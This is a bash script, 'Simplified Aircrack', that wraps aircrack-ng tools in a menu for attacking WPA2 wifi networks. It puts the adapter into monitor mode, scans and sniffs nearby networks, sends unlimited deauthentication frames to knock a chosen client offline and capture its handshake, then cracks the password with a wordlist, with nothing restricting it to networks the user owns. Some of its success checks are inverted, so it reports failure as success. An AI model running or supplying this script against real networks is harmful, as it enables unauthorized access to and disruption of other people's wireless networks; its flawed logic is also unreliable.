#!/bin/bash
#Simplified Aircrack | Use ROOT
#V3
GREEN="\e[1;32m"
RED="\e[1;31m"
YELLOW="\e[1;33m"
COEND="\e[0m"

start()
{
echo "Start"

}

menu()
{

clear
echo "-------------------------------------------------------"
echo -e "$GREEN ~Simplified Aircrack~ $COEND"
printf "Which operation would you like to run...?\n"
echo -e "$GREEN [1] Start $COEND"
echo -e "$RED [2] Exit $COEND"
echo -e "$YELLOW [3] README $COEND"
echo "-------------------------------------------------------"
date
uptime
read start_menu

case $start_menu in
1)
	echo -e "$GREEN Moving to main menu... $COEND"
	clear
	start

	;;

2)
	echo -e "$RED Shutting Down... $COEND"
	clear
	exit

	;;

3)
	echo -e "$YELLOW ~READ ME~ $COEND"
	echo "Before cracking add a folder at the destination of -/root/Crack-"
	echo "Make sure you have a list of words to use"
	echo "Good source for learning cracking https://www.youtube.com/watch?v=uEXugINjFuo&index=1&list=WL"
	read WAIT_FOR_USER
	clear
	menu
	
	;;

*)
	echo -e "$RED Invalid Input, Redirecting... $COEND"
	sleep 1
	menu
	;;
	esac
}

menu

begin()
{
echo -e "$GREEN Loading Menu... $COEND"

}
menu2()
{

clear
echo -e "$YELLOW ############################################### $COEND"
printf "[1] View all surrounding wireless networks\n"
printf "[2] Listen on one CH\n"
printf "[3] Listen on one CH | Write data to a file\n"
printf "[4] Password Cracking\n"
echo -e "$RED [5] Exit $COEND"
echo -e "$GREEN ----------------------------------------------------------- $COEND"
read begin_menu2

case $begin_menu2 in
1)
	sleep 1
	airmon-ng start wlan0
	airodump-ng mon0
	if [ $? -eq 0 ]; then
		echo -e "$GREEN [+] Success... $COEND"
	else
		echo -e "$RED [!] Unsuccessful... $COEND"
		read WAIT_FOR_USER
		clear
		menu2
	fi
	read WAIT_FOR_USER
	clear
	menu2

	;;

2)
	sleep 1
	airmon-ng start wlan0
	echo -e "$RED [!] Input CH $COEND"
	read CH
	echo -e "$RED [!] Input BSSID $COEND"
	read BSSID
	echo -e "$RED [!] Input INTERFACE $COEND"
	read INTERFACE
	airodump-ng -c $CH --bssid $BSSID -w dump $INTERFACE
	if [ $? -eq 0 ]; then
		echo -e "$GREEN [+] Success... $COEND"
	else
		echo -e "$RED [!] Unsuccessful... $COEND"
		read WAIT_FOR_USER
		clear
		menu2
	fi
	read WAIT_FOR_USER
	clear
	menu2

	;;

3)
	sleep 1
	echo -e "$RED [!] Input CH $COEND"
	read CH
	echo -e "$RED [!] Input BSSID $COEND"
	read BSSID
	echo -e "$RED [!] INTERFACE $COEND"
	read INTERFACE
	airodump-ng -c $CH --bssid $BSSID -w dump $INTERFACE
	if [ $? -ne 0 ]; then
	    echo -e "$GREEN [+] Data written | Sniff complete $COEND"
	else
	    echo -e "$RED [!] Unsuccessful... $COEND"
		sleep 1
		clear
		menu2
	fi
	read WAIT_FOR_USER
	clear
	menu2

	;;

4)
	mkdir -p /root/Crack
	sleep 1
	airmon-ng check kill
	ifconfig wlan0 down
	airmon-ng start wlan0
	read WAIT_FOR_USER
	echo "-----------------------------------------------------------"
	echo -e "$YELLOW Searching for surrounding networks $COEND"
	sleep 2
	airodump-ng mon0
	echo "-----------------------------------------------------------"
	echo -e "$RED [!] Input CH $COEND"
	read CH
	echo -e "$RED [!] Input BSSID $COEND"
	read BSSID
	airodump-ng mon0 -c $CH --bssid $BSSID -w /root/Crack/wpa2psk
	echo "-----------------------------------------------------------"
	echo -e "$RED [!] Input BSSID $COEND"
	read BSSID
	echo -e "$RED [!] Input STATION $COEND"
	read STATION
	aireplay-ng -0 0 -a $BSSID -c $STATION mon0
	echo "-----------------------------------------------------------"
	echo -e "$YELLOW Example of CAPDEST and WORDDEST $COEND"
	echo -e "$YELLOW /root/Crack/wpa2psk-01.cap | root/Desktop/Wordlist $COEND"
	echo -e "$RED [!] Input CAPDEST $COEND"
	read CAPDEST
	echo -e "$RED [!] Input WORDDEST $COEND"
	read WORDDEST
	echo -e "$RED This may take a while to process -press enter to execute cracking- $COEND"
	read WAIT_FOR_USER
	aircrack-ng $CAPDEST -w $WORDDEST
	if [ $? -ne 0 ]; then
	    echo -e "$GREEN [+] Cracking success... $COEND"
	else
	    echo -e "$RED [!] Unsuccessful... $COEND"
	fi
	read WAIT_FOR_USER
	clear
	menu2
	
	;;
	
5)
	echo -e "$RED [!] Shutting down... $COEND"
	clear
	exit

	;;

*)
	echo -e "$RED [!] Invalid Input, Redirecting... $COEND"
	clear
	menu2
	;;
	esac
}

menu2
